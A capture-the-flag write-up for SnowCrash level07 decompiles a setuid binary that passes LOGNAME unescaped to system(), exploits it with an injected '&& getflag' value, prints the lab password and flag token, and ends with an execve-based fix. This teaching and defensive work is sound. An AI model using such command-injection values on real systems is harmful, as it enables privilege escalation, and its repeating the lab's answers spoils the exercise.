# Level 07

## how to login

username: level07

password: wiok45aaoguiboiki2tuin6ub

## Goal

run `getflag` as user `flag07`

## Actually doing something

```bash
level07@SnowCrash:~$ ll
total 24
dr-x------ 1 level07 level07  120 Mar  5  2016 ./
d--x--x--x 1 root    users    340 Aug 30  2015 ../
-r-x------ 1 level07 level07  220 Apr  3  2012 .bash_logout*
-r-x------ 1 level07 level07 3518 Aug 30  2015 .bashrc*
-rwsr-sr-x 1 flag07  level07 8805 Mar  5  2016 level07*
-r-x------ 1 level07 level07  675 Apr  3  2012 .profile*
```

seems like reverse engineering to me: `level07` is a setuid/setgid binary owned by `flag07`

```bash
level07@SnowCrash:~$ ./level07
level07
```

seems to be fun at parties indeed

let's crack open ghidra

```c
int main(int argc,char **argv,char **envp)
{
  char *pcVar1;
  int iVar2;
  char *buffer;
  gid_t gid;
  uid_t uid;
  char *local_1c;
  __gid_t local_18;
  __uid_t local_14;

  local_18 = getegid();
  local_14 = geteuid();
  setresgid(local_18,local_18,local_18);
  setresuid(local_14,local_14,local_14);
  local_1c = (char *)0x0;
  pcVar1 = getenv("LOGNAME");
  asprintf(&local_1c,"/bin/echo %s ",pcVar1);
  iVar2 = system(local_1c);
  return iVar2;
}
```

we have the classic setuid dance at the beginning of the function, then a call to `getenv` + `asprintf` + `system`

I see a `system` so I know we are on track!

but let's go in order and clean up the code a bit

```c
#define _GNU_SOURCE   /* asprintf is a GNU extension */
#include <stdio.h>
#include <stdlib.h>

/* Cleaned-up decompilation; the setresgid/setresuid calls are left out for readability. */
int main(int argc,char **argv,char **envp)
{
  char *env;
  int ret;
  char *str;

  str = NULL;
  env = getenv("LOGNAME");                /* attacker-controlled environment variable */
  asprintf(&str,"/bin/echo %s ",env);     /* builds the command line, no escaping */
  ret = system(str);                      /* hands the string to the shell */
  return ret;
}
```

already way better

It looks like it does something like this:

- Get the variable `LOGNAME`
- Create a string that looks like `/bin/echo $LOGNAME` using `asprintf`
  (`asprintf` allocates a string and fills it with what a regular `printf` would output for the same format)
- Call `system` to execute the created string

`system` runs its argument through `/bin/sh -c`, so any shell metacharacters in `LOGNAME` are interpreted by the shell, and the user fully controls that variable.

To me this reeks of a simple `&& getflag`, let's try it out!

```bash
level07@SnowCrash:~$ LOGNAME="&& getflag" ./level07

Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
```
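
How the `getenv` + `asprintf` + `system` pattern above would be fixed, as an added example (not code from the level07 binary or from this writeup): the value is checked against an allowlist and passed to `/bin/echo` as a single argv element with a fixed environment, so no shell ever parses it. The names `is_safe_logname` and `run_echo` and the 32-character limit are assumptions made for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist check (hypothetical helper): 1-32 chars of [A-Za-z0-9_.-],
 * not starting with '-' so it can never be read as an option. */
int is_safe_logname(const char *s)
{
    if (s == NULL || *s == '\0' || *s == '-' || strlen(s) > 32)
        return 0;
    for (; *s; s++)
        if (!isalnum((unsigned char)*s) && *s != '_' && *s != '.' && *s != '-')
            return 0;
    return 1;
}

/* Runs /bin/echo with the name as one argv element: no shell parses it.
 * Returns the child's exit status, or -1 if rejected or on error. */
int run_echo(const char *name)
{
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL }; /* fixed, minimal env */
    int status;
    pid_t pid;
    if (!is_safe_logname(name))
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "echo", (char *)name, NULL };
        execve("/bin/echo", argv, envp);
        _exit(127); /* only reached if execve failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    int rc = run_echo(getenv("LOGNAME"));
    if (rc < 0)
        fputs("refusing to echo unsafe LOGNAME\n", stderr);
    return rc < 0 ? 1 : rc;
}
```

Either measure alone closes this bug; using `execve` with an argv array is the structural fix, and the allowlist is defense in depth.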